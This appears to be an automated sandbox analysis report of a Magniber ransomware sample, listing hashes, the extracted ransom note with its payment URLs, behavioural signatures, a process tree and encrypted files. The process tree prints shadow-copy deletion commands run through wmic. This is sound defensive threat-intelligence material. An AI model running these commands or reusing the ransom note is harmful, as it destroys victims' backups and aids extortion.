Overview

overview

10

Static

static

3.exe

windows7_x64

10

3.exe

windows10_x64

10

Analysis

  • max time kernel
    0s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    22-06-2021 14:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3.exe

  • Size

    21KB

  • MD5

    4160c35d3c600712b528e8072de1bc58

  • SHA1

    12c822103678fed7b928f0202eb7e51714ab3b56

  • SHA256

    f2ab74ce11c4462db427db65ff5755db4d5267d373172384a241017150e14675

  • SHA512

    f722f7a5560641b0cbeb73dfb9d495cf2920858acfdcd5806f619256f2810569486be00eee4547b07298ca20c18d478f3f567809a7b2ff9cf81519e057a3a962

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Public\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://7a3876288814c040d0lqcsthxnw.ndkeblzjnpqgpo5o.onion/lqcsthxnw Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://7a3876288814c040d0lqcsthxnw.wonride.site/lqcsthxnw http://7a3876288814c040d0lqcsthxnw.lognear.xyz/lqcsthxnw http://7a3876288814c040d0lqcsthxnw.lieedge.casa/lqcsthxnw http://7a3876288814c040d0lqcsthxnw.bejoin.space/lqcsthxnw Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://7a3876288814c040d0lqcsthxnw.ndkeblzjnpqgpo5o.onion/lqcsthxnw

http://7a3876288814c040d0lqcsthxnw.wonride.site/lqcsthxnw

http://7a3876288814c040d0lqcsthxnw.lognear.xyz/lqcsthxnw

http://7a3876288814c040d0lqcsthxnw.lieedge.casa/lqcsthxnw

http://7a3876288814c040d0lqcsthxnw.bejoin.space/lqcsthxnw

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 9 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1228
      • C:\Users\Admin\AppData\Local\Temp\3.exe
        "C:\Users\Admin\AppData\Local\Temp\3.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        PID:484
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          3⤵
            PID:364
            • C:\Windows\system32\wbem\WMIC.exe
              C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
              4⤵
                PID:524
            • C:\Windows\system32\cmd.exe
              cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
              3⤵
                PID:676
                • C:\Windows\system32\wbem\WMIC.exe
                  C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                  4⤵
                    PID:752
              • C:\Windows\system32\cmd.exe
                cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
                2⤵
                  PID:1244
                  • C:\Windows\system32\wbem\WMIC.exe
                    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                    3⤵
                      PID:1640
                • C:\Windows\system32\Dwm.exe
                  "C:\Windows\system32\Dwm.exe"
                  1⤵
                    PID:1180
                    • C:\Windows\system32\cmd.exe
                      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
                      2⤵
                        PID:1284
                        • C:\Windows\system32\wbem\WMIC.exe
                          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                          3⤵
                            PID:320
                      • C:\Windows\system32\taskhost.exe
                        "taskhost.exe"
                        1⤵
                          PID:1120
                          • C:\Windows\system32\notepad.exe
                            notepad.exe C:\Users\Public\readme.txt
                            2⤵
                            • Opens file in notepad (likely ransom note)
                            PID:1952
                          • C:\Windows\system32\cmd.exe
                            cmd /c "start http://7a3876288814c040d0lqcsthxnw.wonride.site/lqcsthxnw^&1^&27711471^&80^&343^&12"
                            2⤵
                              PID:1740
                              • C:\Program Files\Internet Explorer\iexplore.exe
                                "C:\Program Files\Internet Explorer\iexplore.exe" http://7a3876288814c040d0lqcsthxnw.wonride.site/lqcsthxnw&1&27711471&80&343&12
                                3⤵
                                  PID:1788
                                  • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1788 CREDAT:275457 /prefetch:2
                                    4⤵
                                      PID:2180
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
                                  2⤵
                                    PID:1776
                                    • C:\Windows\system32\wbem\WMIC.exe
                                      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
                                      3⤵
                                        PID:1212
                                  • C:\Windows\system32\cmd.exe
                                    cmd /c CompMgmtLauncher.exe
                                    1⤵
                                    • Process spawned unexpected child process
                                    PID:2092
                                    • C:\Windows\system32\CompMgmtLauncher.exe
                                      CompMgmtLauncher.exe
                                      2⤵
                                        PID:2228
                                        • C:\Windows\system32\wbem\wmic.exe
                                          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                          3⤵
                                            PID:2468
                                      • C:\Windows\system32\cmd.exe
                                        cmd /c CompMgmtLauncher.exe
                                        1⤵
                                        • Process spawned unexpected child process
                                        PID:2084
                                        • C:\Windows\system32\CompMgmtLauncher.exe
                                          CompMgmtLauncher.exe
                                          2⤵
                                            PID:2264
                                            • C:\Windows\system32\wbem\wmic.exe
                                              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                              3⤵
                                                PID:2540
                                          • C:\Windows\system32\cmd.exe
                                            cmd /c CompMgmtLauncher.exe
                                            1⤵
                                            • Process spawned unexpected child process
                                            PID:2076
                                            • C:\Windows\system32\CompMgmtLauncher.exe
                                              CompMgmtLauncher.exe
                                              2⤵
                                                PID:2276
                                                • C:\Windows\system32\wbem\wmic.exe
                                                  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                  3⤵
                                                    PID:2432
                                              • C:\Windows\system32\cmd.exe
                                                cmd /c CompMgmtLauncher.exe
                                                1⤵
                                                • Process spawned unexpected child process
                                                PID:2068
                                                • C:\Windows\system32\CompMgmtLauncher.exe
                                                  CompMgmtLauncher.exe
                                                  2⤵
                                                    PID:2204
                                                    • C:\Windows\system32\wbem\wmic.exe
                                                      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                      3⤵
                                                        PID:2400
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd /c CompMgmtLauncher.exe
                                                    1⤵
                                                    • Process spawned unexpected child process
                                                    PID:2060
                                                    • C:\Windows\system32\CompMgmtLauncher.exe
                                                      CompMgmtLauncher.exe
                                                      2⤵
                                                        PID:2220
                                                        • C:\Windows\system32\wbem\wmic.exe
                                                          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                                                          3⤵
                                                            PID:2484
                                                      • C:\Windows\system32\vssadmin.exe
                                                        vssadmin.exe Delete Shadows /all /quiet
                                                        1⤵
                                                        • Process spawned unexpected child process
                                                        • Interacts with shadow copies
                                                        PID:2692
                                                      • C:\Windows\system32\vssvc.exe
                                                        C:\Windows\system32\vssvc.exe
                                                        1⤵
                                                          PID:2752
                                                        • C:\Windows\system32\vssadmin.exe
                                                          vssadmin.exe Delete Shadows /all /quiet
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Interacts with shadow copies
                                                          PID:2772
                                                        • C:\Windows\system32\vssadmin.exe
                                                          vssadmin.exe Delete Shadows /all /quiet
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Interacts with shadow copies
                                                          PID:2780
                                                        • C:\Windows\system32\vssadmin.exe
                                                          vssadmin.exe Delete Shadows /all /quiet
                                                          1⤵
                                                          • Process spawned unexpected child process
                                                          • Interacts with shadow copies
                                                          PID:2828

                                                        Network

                                                        MITRE ATT&CK Enterprise v6

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\T3AA9KV2.txt
                                                          MD5

                                                          a554da88560d43180ae443013aaf1132

                                                          SHA1

                                                          01745964beb7ebef5b393567883598e528850f06

                                                          SHA256

                                                          779a3a416577e0fcfb117c820cbb2408f129861468423090b61baba0d6e4069e

                                                          SHA512

                                                          f3476fca1e75cfb6d577daff0991ad9d0d5004c2252dfee0a9867e9865ad144302ebc901c1f4f1baef0ec37916fe06f9bdf6fe99657c3bcdb3d071e2c1387c3b

                                                          Download Submit

                                                        • C:\Users\Admin\Desktop\CompressAssert.svgz.lqcsthxnw
                                                          MD5

                                                          1adcb3df869d4b4e0f781adeaa83a11f

                                                          SHA1

                                                          6b3bdc917fdc77693df7d5c24f813660b606613a

                                                          SHA256

                                                          26dc4ebb4b027df46e0bdfdd36764775272b85739c4eaa467d0aa07d7a58fc4b

                                                          SHA512

                                                          9228f56be53913fdd08403fbf0f3a5bddfc5a288000296dde0c1e622f8d372da2fccc63688e4ac2ca102fb6b12525603d624a26d6834adc5d34f6e087603065a

                                                          Download Submit

                                                        • C:\Users\Admin\Desktop\EnableStart.ppsx.lqcsthxnw
                                                          MD5

                                                          9c7be339eba46cd47d3c391da7a9708e

                                                          SHA1

                                                          a659b7d694a4474219db39cd99350e3852301634

                                                          SHA256

                                                          17b682fae7e9bb3f04bb379a3e9aa2bafa8fd2a15e788d298fd35e6e7448aefa

                                                          SHA512

                                                          39c55d58d6d24d9e5c6fe0477c31586f0996bf13b1cbf41e49f8355796394fe0ed6f9ca936a84beb35cf992753de4166e3ed49e9ba66030b585448f0b2ce50a7

                                                          Download Submit

                                                        • C:\Users\Admin\Desktop\FindInvoke.asp.lqcsthxnw
                                                          MD5

                                                          ce5f2e26c90393fe1a222d842358aa76

                                                          SHA1

                                                          d413824474f9ebfd721d417e69b1e2b5c3d6d9d9

                                                          SHA256

                                                          05c5c904051bec7ccff60f28d620b11618510110ee7326dfc4cb6e6780fe6a77

                                                          SHA512

                                                          0154a50d7b3ab5b47e0805f672839ce9472451aa7e5957500cab889cbf47f3fa2c4c401d092774f21ae215413bfd950bab103e94df259c53523e288e30e92338

                                                          Download Submit

                                                        • C:\Users\Admin\Desktop\InvokeRedo.tiff.lqcsthxnw
                                                          MD5

                                                          dde0b4c91bed6a562a7127f3ebf40147

                                                          SHA1

                                                          e98cf23c11948bf50fe94f3cb80ea9af4e9a6e21

                                                          SHA256

                                                          3740441c3740c9b4d46f728cb48f93ffb9f5bb8aa7d405aa5a59b599e9499b23

                                                          SHA512

                                                          23a148ec5c4de5d66abeb65d360a4b9237b17074442c2d511acf2cbdd52d6bdcac524e29ce82a7a34ea2138403ccf3340d9912ab2b1c375f4177f7f073621947

                                                          Download Submit

                                                        • C:\Users\Admin\Desktop\ProtectWatch.rar.lqcsthxnw
                                                          MD5

                                                          5b2c628d63125e8f071097a2d7f1fe96

                                                          SHA1

                                                          7ba5d6711e0f362f5bbbce95cf7fe7ccadfb7a3b

                                                          SHA256

                                                          98c872fa061a0334f29ac4783651d477bd7a86bb4342611765ec7f86de35fcad

                                                          SHA512

                                                          9defc89b086b0460e61f5fd0895ff8bb5fbe3db621c812ad59dc1510375a77fc6d4c296abd4d208fca01f1324b7cd8f8b41da27eae579f26f8c24684f902f3ff

                                                          Download Submit

                                                        • C:\Users\Admin\Desktop\ResumeNew.odt.lqcsthxnw
                                                          MD5

                                                          69f05b67b74ab2a0863ba1f1cb30b49f

                                                          SHA1

                                                          96b9dc903905d3920b0eb3dfb1b565fa0eb9f2e6

                                                          SHA256

                                                          c8ce90a28c41ca24f55bc9e22b1e64639c3a00ac6cd273d19e5c7af013504321

                                                          SHA512

                                                          332c98929fdd464592a6ee53f312c53c9c1e100af3e2dd0428a8d8a57ea24174e930f772ac3a543678913cabceb78adc1cc5dd94cc927dd4257facd5980bbaef

                                                          Download Submit

                                                        • C:\Users\Admin\Desktop\ResumeRename.vstx.lqcsthxnw
                                                          MD5

                                                          ad802f9881e622e85c27db13db183a70

                                                          SHA1

                                                          500d4bf981121357814472da31fbfd24c501ece1

                                                          SHA256

                                                          0cdb897b5241985408fecb8292fb57f0b90b5ef07bc999c5f87a93b61730b986

                                                          SHA512

                                                          0bb68a10747df01383a89fae27a3847c8808fc272ada3c5ff0da15624dbd97bf35a7bb61bba4f15823eda116873683eb2becd8162c519eb08b627231e74190aa

                                                          Download Submit

                                                        • C:\Users\Admin\Desktop\SuspendTrace.emf.lqcsthxnw
                                                          MD5

                                                          83221f4ea8fc0489fdd4c31f80e8d553

                                                          SHA1

                                                          6658188576e0f6192cadd9eb345b8306694e9470

                                                          SHA256

                                                          2fde7fa2a4a1d3065cfb939e9c51dec98f61f542e69996954d5b46821a3366df

                                                          SHA512

                                                          a12b0872fd5fad2932c834e4d7d61ac33a63e558bd5826914bc272f1aa6f99bf0e5baf608938617f21bb4a9f25fdcd8a394405a9e778831758815a3e0c765f87

                                                          Download Submit

                                                        • C:\Users\Admin\Desktop\SyncDeny.rar.lqcsthxnw
                                                          MD5

                                                          c483d93f39a3069b4b306b5d8a9c71c0

                                                          SHA1

                                                          276916735e330b26c13eb1d1e9c4728f0c4f2c79

                                                          SHA256

                                                          ea800020207ecfb174496dab6bcd7a86210e6f905b95cecba36f6cbb94978a9d

                                                          SHA512

                                                          9b11f4b1405b12c7e789059231ede034c7ee030774d0a84711e48087e13ed74a4e295a543001911b5e533613bee4e3e09d2c2615f064d17e82c3ee3cc3f70ba1

                                                          Download Submit

                                                        • C:\Users\Admin\Desktop\TraceFormat.pot.lqcsthxnw
                                                          MD5

                                                          95849c94d73b8930333b344516c7fd3b

                                                          SHA1

                                                          c6b5bdccde1f59cb7e40c3fd7492b93043e7f33b

                                                          SHA256

                                                          77dbbd0b511c4ed74c1d6a25853e0d97cf0f86d9f5d80c3d8aa97b569aa59b50

                                                          SHA512

                                                          ec50fe66f694dc778ab0e21805e56ba125ba4b262feca6008dd31b0ed26d9cb623cca9c0ff8e532d85a4af84c31560f03538ffb390c6cf1637b031b78b488712

                                                          Download Submit

                                                        • C:\Users\Admin\Desktop\WriteJoin.rar.lqcsthxnw
                                                          MD5

                                                          6589f16e9f87f4e87df6737ff259199f

                                                          SHA1

                                                          fd69d980042ec343c8806a571c85a57f2cc9b907

                                                          SHA256

                                                          850fb9d3d43bd223f4f65b4c805b9557310a242a8c0c9d8c247961b310c0480a

                                                          SHA512

                                                          9345fbf797103461dad7ce97b5caeae0d7dbaaaab8fb0687272b9192259b17b77b6a9583ce756b532d7099997efa2eed521b43adda3a694c69d4df29dc574ee8

                                                          Download Submit

                                                        • C:\Users\Admin\Desktop\readme.txt
                                                          MD5

                                                          ef763a20a3ce79bcd3141e2672bac390

                                                          SHA1

                                                          62160518d5414aae7c43e6b15cdb5711694b14ba

                                                          SHA256

                                                          b27f0a0019214f6d1ca1af9bbc2976e260e21ac52a93f9bcb00c9062eea173cd

                                                          SHA512

                                                          07d06fccb7c9c36b499197167ae08cab79adfcf03a3d20319e6827141efff89e2f746a42e8bd2afaaeb3a78285ac8ebd82547c098454f2529e8dc6bf0fa75803

                                                          Download Submit

                                                        • C:\Users\Public\readme.txt
                                                          MD5

                                                          ef763a20a3ce79bcd3141e2672bac390

                                                          SHA1

                                                          62160518d5414aae7c43e6b15cdb5711694b14ba

                                                          SHA256

                                                          b27f0a0019214f6d1ca1af9bbc2976e260e21ac52a93f9bcb00c9062eea173cd

                                                          SHA512

                                                          07d06fccb7c9c36b499197167ae08cab79adfcf03a3d20319e6827141efff89e2f746a42e8bd2afaaeb3a78285ac8ebd82547c098454f2529e8dc6bf0fa75803

                                                          Download Submit

                                                        • \??\PIPE\srvsvc
                                                          MD5

                                                          d41d8cd98f00b204e9800998ecf8427e

                                                          SHA1

                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                          SHA256

                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                          SHA512

                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                          Download Submit

                                                        • memory/320-86-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/364-83-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/484-62-0x0000000001D20000-0x0000000001D21000-memory.dmp

                                                          Filesize

                                                          4KB

                                                          Download

                                                        • memory/484-60-0x0000000000020000-0x0000000000025000-memory.dmp

                                                          Filesize

                                                          20KB

                                                          Download

                                                        • memory/484-61-0x00000000000E0000-0x00000000000E1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                          Download

                                                        • memory/524-85-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/676-84-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/752-87-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/1212-89-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/1228-63-0x0000000003CD0000-0x0000000003CE0000-memory.dmp

                                                          Filesize

                                                          64KB

                                                          Download

                                                        • memory/1244-70-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/1284-69-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/1640-88-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/1740-67-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/1776-68-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/1788-91-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/1952-65-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp

                                                          Filesize

                                                          8KB

                                                          Download

                                                        • memory/1952-64-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/2180-93-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/2204-94-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/2220-95-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/2228-96-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/2264-97-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/2276-98-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/2400-104-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/2432-105-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/2468-107-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/2484-108-0x0000000000000000-mapping.dmp

                                                          Download

                                                        • memory/2540-109-0x0000000000000000-mapping.dmp

                                                          Download